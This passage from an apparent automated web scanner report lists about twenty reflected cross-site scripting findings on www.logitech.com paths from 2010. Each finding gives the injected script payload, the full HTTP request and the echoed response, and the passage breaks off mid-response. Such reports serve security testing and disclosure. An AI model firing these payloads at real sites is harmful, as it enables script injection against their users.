1.191. http://www.logitech.com/en-us/349/6072 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6072

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c067"><script>alert(1)</script>0ff74f39623 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/349/60723c067"><script>alert(1)</script>0ff74f39623 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="349/60723c067"><script>alert(1)</script>0ff74f39623">
...[SNIP]...

1.192. http://www.logitech.com/en-us/349/6072 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6072

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bc63</script><script>alert(1)</script>b178cbb70e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/349/60723bc63</script><script>alert(1)</script>b178cbb70e HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349/60723bc63</script><script>alert(1)</script>b178cbb70e' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.193. http://www.logitech.com/en-us/349/6775 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6775

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c707</script><script>alert(1)</script>33f9bdeee5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /9c707</script><script>alert(1)</script>33f9bdeee5a/349/6775 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','9c707</script><script>alert(1)</script>33f9bdeee5a/349/6775' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'D
...[SNIP]...

1.194. http://www.logitech.com/en-us/349/6775 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6775

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad825"><script>alert(1)</script>295434f427f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-usad825"><script>alert(1)</script>295434f427f/349/6775 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-usad825"><script>alert(1)</script>295434f427f/349/6775">
...[SNIP]...

1.195. http://www.logitech.com/en-us/349/6775 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/349/6775

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 168dd"%3b2d6279d6b62 was submitted in the REST URL parameter 1. This input was echoed as 168dd";2d6279d6b62 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us168dd"%3b2d6279d6b62/349/6775 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-us168dd";2d6279d6b62/349/6775";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.196. http://www.logitech.com/en-us/349/6775 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6775

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 606e9</script><script>alert(1)</script>815036778ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/349606e9</script><script>alert(1)</script>815036778ee/6775 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349606e9</script><script>alert(1)</script>815036778ee/6775' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.197. http://www.logitech.com/en-us/349/6775 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6775

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d057"><script>alert(1)</script>b8b89d6bd9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/3498d057"><script>alert(1)</script>b8b89d6bd9/6775 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="3498d057"><script>alert(1)</script>b8b89d6bd9/6775">
...[SNIP]...

1.198. http://www.logitech.com/en-us/349/6775 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6775

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e6e2</script><script>alert(1)</script>bb3b428b617 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/349/67757e6e2</script><script>alert(1)</script>bb3b428b617 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349/67757e6e2</script><script>alert(1)</script>bb3b428b617' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.199. http://www.logitech.com/en-us/349/6775 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6775

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ac07"><script>alert(1)</script>97157e42f5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/349/67759ac07"><script>alert(1)</script>97157e42f5 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="349/67759ac07"><script>alert(1)</script>97157e42f5">
...[SNIP]...

1.200. http://www.logitech.com/en-us/349/7073 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7073

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf44"><script>alert(1)</script>6b9841d87ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us3cf44"><script>alert(1)</script>6b9841d87ce/349/7073 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us3cf44"><script>alert(1)</script>6b9841d87ce/349/7073">
...[SNIP]...

1.201. http://www.logitech.com/en-us/349/7073 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/349/7073

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47f76"%3bfd7a8e7c391 was submitted in the REST URL parameter 1. This input was echoed as 47f76";fd7a8e7c391 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us47f76"%3bfd7a8e7c391/349/7073 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-us47f76";fd7a8e7c391/349/7073";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.202. http://www.logitech.com/en-us/349/7073 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7073

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92b52</script><script>alert(1)</script>a773f1bfa5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /92b52</script><script>alert(1)</script>a773f1bfa5/349/7073 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','92b52</script><script>alert(1)</script>a773f1bfa5/349/7073' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'D
...[SNIP]...

1.203. http://www.logitech.com/en-us/349/7073 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7073

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db199"><script>alert(1)</script>0ec9d835d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/349db199"><script>alert(1)</script>0ec9d835d4e/7073 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="349db199"><script>alert(1)</script>0ec9d835d4e/7073">
...[SNIP]...

1.204. http://www.logitech.com/en-us/349/7073 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7073

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 716af</script><script>alert(1)</script>881478f03b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/349716af</script><script>alert(1)</script>881478f03b7/7073 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349716af</script><script>alert(1)</script>881478f03b7/7073' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.205. http://www.logitech.com/en-us/349/7073 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7073

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14603"><script>alert(1)</script>c056dd9fee1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/349/707314603"><script>alert(1)</script>c056dd9fee1 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="349/707314603"><script>alert(1)</script>c056dd9fee1">
...[SNIP]...

1.206. http://www.logitech.com/en-us/349/7073 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7073

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14687</script><script>alert(1)</script>59ccc27ac9c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/349/707314687</script><script>alert(1)</script>59ccc27ac9c HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349/707314687</script><script>alert(1)</script>59ccc27ac9c' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.207. http://www.logitech.com/en-us/349/7393 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/349/7393

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec795"%3bc8ac63c2a7f was submitted in the REST URL parameter 1. This input was echoed as ec795";c8ac63c2a7f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-usec795"%3bc8ac63c2a7f/349/7393 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-usec795";c8ac63c2a7f/349/7393";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.208. http://www.logitech.com/en-us/349/7393 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7393

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ee26"><script>alert(1)</script>6841bfbfbe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us2ee26"><script>alert(1)</script>6841bfbfbe4/349/7393 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us2ee26"><script>alert(1)</script>6841bfbfbe4/349/7393">
...[SNIP]...

1.209. http://www.logitech.com/en-us/349/7393 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7393

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f39bb</script><script>alert(1)</script>d0ecba208c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f39bb</script><script>alert(1)</script>d0ecba208c3/349/7393 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
